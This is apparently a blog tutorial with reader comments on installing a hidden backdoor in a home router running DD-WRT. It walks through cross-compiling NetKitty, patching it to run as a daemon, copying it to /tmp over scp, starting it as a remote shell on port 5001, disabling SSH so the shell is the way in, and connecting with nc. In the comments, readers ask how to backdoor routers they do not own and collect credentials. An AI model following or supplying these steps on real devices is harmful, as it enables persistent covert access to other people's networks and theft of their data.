How To: Install a Hidden Backdoor in a Home Router

Install a Hidden Backdoor in a Home Router

How to Install a Hidden Backdoor in a Home Router

In this short tutorial I will show you the basic concepts on how to install your own software in a home router. It can be a backdoor but it can also be a special monitoring tool or service. We will made some assumptions to keep this tutorial short and simple.

  1. You have access to the router's control panel. This is the case when you own your router and you are practising your security skills on your own network.
  2. The router is running some Open Firmware. In this tutorial I'm assuming it is running DD-wrt.

Step 1: Enable Ssh Access

You can find out how to do that in the official page. Basically you have to click a couple of radio buttons, or type some commands on the command-line.

ssh access will be required to copy our SW in the router and also to launch it.

Step 2: Get Information About the Architecture

As you are using your own router you already know that, but just in case these are some tips.

  • Log in the router using ssh (you had just enable it)
  • In the command-line type uname -m. This command will tell you the type of processor installed in your router. It will probably be a MIPS SoC
  • Also type cat /proc/cpuinfo to get further details.

Step 3: Get the Appropriated Toolchain

Now you need to get (or build) a toolchain for your router platform. In my case I just got one of the official DD-WRT toolchains for MIPS. I'd got the information from one of the messages in the dd-wrt forums.

Download the toolchain and install it.

Step 4: Installing the Toolchain

In general, you just need to do two things to install a toolchain.

  • Uncompress the toolchain package somewhere in your disk
  • Add to the PATH the directory with all the toolchain binaries.

The whole sequence is shown in the screen-shot below.

The tools will all be prefixed by mips-.

For the specific toolchain I am using it is actually mips-linux-. That's important if you have to cross-compile autotools packages... but we are not going to talk about this here.

Step 5: Compiling

To keep this tutorial simple, I'm going to use, once again, Netkitty. This tool is pretty convenient because it does not rely on any external library and therefore, we can just compile it. I'm not covering in this tutorial how to compile other tools that requires libraries. You can found a lot of information on the Internet about cross-compiling and staging packages, in case you need to do that.

To compile NetKitty we just need to do:

You will need to edit the source code to make three changes

  • In line 362 change bash to sh.
  • In line 424 just before the while add a line saying daemon(0,1); (man daemon for details).
  • In line 517 delete "use_sin =" at the beginning of the line.

Those changes converts NetKitty into a daemon so we won't need to use screen or nohup to keep it running when our ssh session is closed.

Step 6: Copy and Run

Now you just need to move the file into the router. We will copy our nk-mips to the /tmp/ directory. This folder always have write permissions and usually also execution permissions. As we've enabled ssh, we can copy the file using scp and execute it remotely using ssh.

scp nk-mips root@router-ip:/tmp
ssh root@router-ip "/tmp/nk-mips -shell -s T,5001

Step 7: Disable SSH Access

Now that your remote shell is running you can disable SSH access in the control panel and log into the router just Netcatting to port 5001

nc router-ip 5001

CONCLUSION

This was a pretty simple example to demonstrate how to run your own SW on your home router. From here you can explore how to deploy more complex tools that depends on external libraries, how to get your applications installed in the router so they can be re-launched after a reboot... Lots of fun!

5 Comments

Very thorough and well written. I'd just like to point out a possible typo or error: "scp nk-mips root@router-ip/tmp"

It should have a colon after the remote host, like this:
scp nk-mips user@host:/dirs/

Just letting you know so as to attract less questions from newbies who don't realise that the command is missing a character.

TRT

Thanks TRT and good catch. It was indeed a typo. I'd had fixed.

I found my ISP router using shodan,and got the password,is it possible to launch a sort of mimt to collect data and crend

First, you have to understand that accessing somebody's else router is illegal.

Said that, high performance routers are different beast and they run special operating systems. Cisco routers use to run IOS (not sure if that is still the case), those seems to be based on QNX , Juniper router uses JunOS based on Free-BSD and, according to the wikipedia page there is an SDK available.

I never had a chance to work with any of those system so I cannot really answer your question. I would suggest you to do some research to find out that is possible.

What If the router is not mine and I don't have access to the control panel?
I want to install a sort-of backdoor to get the password of the network whenever I want. is that possible?

Share Your Thoughts

  • Hot
  • Latest